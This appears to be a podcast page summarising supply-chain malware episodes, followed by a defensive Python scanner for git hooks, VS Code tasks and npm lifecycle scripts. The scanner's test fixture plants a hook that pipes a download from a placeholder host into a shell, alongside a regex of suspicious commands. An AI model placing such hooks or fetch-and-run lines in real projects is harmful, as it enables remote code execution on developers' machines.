The OpenSourceMalware Show
OpenSourceMalware
This podcast explores the growing threat of malicious open source software that targets developers and build systems. Hosted by Jenn Gile and Paul McCarty, co-founders of OpenSourceMalware, it covers the latest trends and attacks in software supply chain security and helps defenders understand the tactics being used so their organizations are not the next target. OpenSourceMalware provides community-driven threat intelligence on malicious open source assets.
Episodes
- MSFT hit by Miasma worm, VS Code cooldowns, npm v12 breaking changes (11.06.2026, 39 min)
  Miasma Worm Hits Microsoft — On June 5th, 73 Microsoft GitHub repositories were disabled in 105 seconds after being compromised by the Miasma worm. Four GitHub organizations were affected, including Azure Functions, which broke CI jobs worldwide for anyone calling those official GitHub Actions. The initial foothold traces back to a May 19th compromise of the Durable Task repo, with threat actors maintaining persistence via stolen credentials before returning to trigger the mass takedown. As o...
- Miasma npm worm hits Red Hat, new OpenSourceMalware research on 2026 trends, the Moika campaign (04.06.2026, 40 min)
  This week Paul and Jenn talk about: Miasma Campaign — Starting June 1st with 32 Red Hat @redhat-cloud-services packages (averaging 80,000 weekly downloads) compromised, the campaign expanded to over 80 packages and 286+ malicious versions within days. The worm is the first confirmed in-the-wild use of TeamPCP's open-sourced Mini Shai Hulud worm, though TeamPCP has not claimed credit. It is multi-ecosystem (npm, PyPI, RubyGems) and the Ruby variant appears to be LLM-translated, not part of the ...
- OSV false positives, CrowdStrike takedown of Glassworm infra, and MSFT nukes a researcher (28.05.2026, 28 min)
  This week Jenn and Paul covered: OSV false positives from AWS Inspector: AWS's automated malware detection pipeline submitted 157 false-positive entries to osv.dev. The entries were merged before anyone caught the errors. When the community began pointing out that some of those "false positives" were actually real malware, AWS started adding some back, making this a mess on both ends. AppSec vendors piled on publicly despite relying on OSV as their primary detection source without contributin...
- GitHub popped by malicious VS Code extension, npm staged publishing debuts (21.05.2026, 28 min)
  This week Jenn and Paul cover: npm Staged Publishing: npm's new feature adds a human approval checkpoint before a package goes live. Real improvement, real caveats. We walk through what it does, where it falls short, and the questions the docs still don't answer. DPRK Axios-Linked npm Packages: Paul discovered three malicious npm packages tied to the March Axios attacker that have been quietly harvesting credentials since early April. Classic DPRK multi-use attack infrastructure, built to supp...
- RubyGems bot attack, ShinyHunters ransom Canvas, and the latest on Mini Shai Hulud (14.05.2026, 32 min)
  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty for episode four! In this episode: RubyGems bot attack: Hundreds of bots pushed 500-plus packages to RubyGems, some carrying exploits, forcing the registry to shut down new account signups. Jenn and Paul break down why the DDoS label may be misleading and what this exposes about the friction-vs-safety tradeoff every open source registry faces. Canvas ransomware by ShinyHunters: ShinyHunters breached Instructure, the company behind t...
- Git hook persistence, Antrea compromise, Dirty Frag, cPanel exploitation, interpreted language malware (07.05.2026, 27 min)
  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty for episode three, covering the latest threat activity and a deep dive they've been promising since episode one. In this episode: DPRK Lazarus Group using git hooks: Paul's latest research shows the Contagious Interview / TaskJacker campaign has evolved. The initial loader is still the VS Code tasks.json file, but it now calls concatenated Git commands that drop malware via pre-commit and post-checkout git hooks, hiding the payload ...
- Lovable and Vercel incidents, GitHub RCE, EDR vs. AI agents, Mini Shai Hulud by TeamPCP (30.04.2026, 25 min)
  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty as they cover a week that had defenders everywhere ready to call it on 2026. In this episode, we cover four topics: Lovable and Vercel incident response failures: Two AI-native platforms had significant security incidents in recent weeks, and both initially responded by minimizing the severity. We break down why Lovable's regression exposed source code and full chat history to any free account holder (the mother of all IDORs), why ...
- Bitwarden CLI compromise, npm lifecycle scripts, OWASP cheat sheet, cross-ecosystem attacks (27.04.2026, 37 min)
  Welcome to the very first episode of The OpenSourceMalware Show! Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty as they break down the latest news, threats, and best practices in the open-source ecosystem. In this episode, we dive into four major topics: Bitwarden CLI Compromise: We analyze the recently discovered malicious version (2026.4.0) of the Bitwarden CLI package. We break down how this cloud-native infostealer silently executes via pre-install scripts to harvest...
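Two of the execution vectors that recur across these episodes, git hook persistence from episode three and npm lifecycle scripts from episode one, can both be surfaced with a short scan of a checkout. The script below is an added example, not code from the show or from OpenSourceMalware. It scans a repository tree that it constructs itself, and the hook, task and script commands it plants there are illustrative placeholders, not taken from any real campaign. It reports live (non-`.sample`) files under `.git/hooks`, a `core.hooksPath` that redirects hooks into a tracked directory, `.vscode/tasks.json` tasks that shell out to git (flagging those set to run when the folder is opened), and `preinstall`/`install`/`postinstall`/`prepare` entries in every `package.json` under the tree, `node_modules` included.

```python
"""Scan a checkout for git hook persistence and npm lifecycle scripts.

Added example, not code from the podcast or from OpenSourceMalware. The tree
it scans is constructed by build_sample_repo(); the commands planted there are
illustrative placeholders, not taken from any real campaign.
"""
import json, os, re, stat, tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
SUSPECT = re.compile(r"\b(curl|wget|base64|eval|bash -c|sh -c)\b", re.I)  # crude, but worth a read


def hooks_dir(repo: Path) -> Path:
    """Honour core.hooksPath, which can move hooks out of .git and into a tracked directory."""
    cfg = repo / ".git" / "config"
    for line in cfg.read_text(errors="ignore").splitlines() if cfg.is_file() else []:
        key, _, val = line.partition("=")
        if key.strip().lower() == "hookspath":
            return repo / val.strip()  # a relative path resolves against the work tree
    return repo / ".git" / "hooks"


def scan_git_hooks(repo: Path) -> list:
    hooks, findings = hooks_dir(repo), []
    if hooks != repo / ".git" / "hooks":
        findings.append({"kind": "hooks_path", "path": os.path.relpath(hooks, repo), "detail": "core.hooksPath set"})
    for f in sorted(hooks.iterdir()) if hooks.is_dir() else []:
        if f.is_file() and not f.name.endswith(".sample"):  # git's *.sample files are inert
            m = SUSPECT.search(f.read_text(errors="ignore"))
            findings.append({"kind": "git_hook", "path": os.path.relpath(f, repo),
                             "executable": bool(f.stat().st_mode & stat.S_IXUSR),
                             "detail": m.group(0) if m else ""})
    return findings


def scan_vscode_tasks(repo: Path) -> list:
    """Tasks that shell out to git; runOn=folderOpen means they fire when the folder is opened."""
    tasks_file, findings = repo / ".vscode" / "tasks.json", []
    if not tasks_file.is_file():
        return findings
    raw = re.sub(r"^\s*//.*$", "", tasks_file.read_text(errors="ignore"), flags=re.M)  # JSONC comments
    for task in json.loads(raw).get("tasks", []):
        args = [a.get("value", "") if isinstance(a, dict) else str(a) for a in task.get("args", [])]
        cmd = " ".join([str(task.get("command", ""))] + args)
        if re.search(r"\bgit\b", cmd):
            findings.append({"kind": "vscode_task", "label": task.get("label", ""), "detail": cmd,
                             "auto_run": task.get("runOptions", {}).get("runOn") == "folderOpen"})
    return findings


def scan_npm_lifecycle(root: Path) -> list:
    """Install-time scripts in every package.json under root, node_modules included."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if "package.json" in filenames:
            pkg = Path(dirpath) / "package.json"
            try:
                scripts = json.loads(pkg.read_text(errors="ignore")).get("scripts") or {}
            except (ValueError, AttributeError):  # unparsable, or not a JSON object: skip it
                continue
            for hook in LIFECYCLE:
                if hook in scripts:
                    findings.append({"kind": "npm_lifecycle", "path": os.path.relpath(pkg, root),
                                     "script": hook, "detail": scripts[hook]})
    return findings


def scan(root: Path) -> list:
    return scan_git_hooks(root) + scan_vscode_tasks(root) + scan_npm_lifecycle(root)


def build_sample_repo() -> Path:
    """Constructed tree: one live hook, one inert sample, an auto-run git task, two lifecycle scripts."""
    root = Path(tempfile.mkdtemp(prefix="ossm-"))
    (root / ".git" / "hooks").mkdir(parents=True)
    hook = root / ".git" / "hooks" / "pre-commit"
    hook.write_text("#!/bin/sh\ncurl -s http://example.invalid/x | sh\n")
    hook.chmod(hook.stat().st_mode | stat.S_IXUSR)
    (root / ".git" / "hooks" / "pre-push.sample").write_text("#!/bin/sh\nexit 0\n")
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(json.dumps({"version": "2.0.0", "tasks": [
        {"label": "build", "type": "shell", "runOptions": {"runOn": "folderOpen"},
         "command": "git config core.hooksPath .githooks && git checkout -- ."}]}))
    (root / "package.json").write_text(json.dumps(
        {"name": "app", "scripts": {"preinstall": "node setup.js", "test": "jest"}}))
    (root / "node_modules" / "dep").mkdir(parents=True)
    (root / "node_modules" / "dep" / "package.json").write_text(json.dumps(
        {"name": "dep", "scripts": {"postinstall": "node -e \"require('./x')\""}}))
    return root


if __name__ == "__main__":
    for finding in scan(build_sample_repo()):
        print(finding)
```

Run it as-is to print the findings for the constructed tree, or call `scan(Path("."))` from inside a real checkout. The heuristics are deliberately loose: a clean project may legitimately ship a `prepare` script or point `core.hooksPath` at a tracked hooks directory, so treat each finding as something to read rather than a verdict. The blunt mitigation for the npm side is `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), which keeps lifecycle scripts from running at all; the git side has no equivalent switch, which is why hook persistence survives a fresh `npm install`.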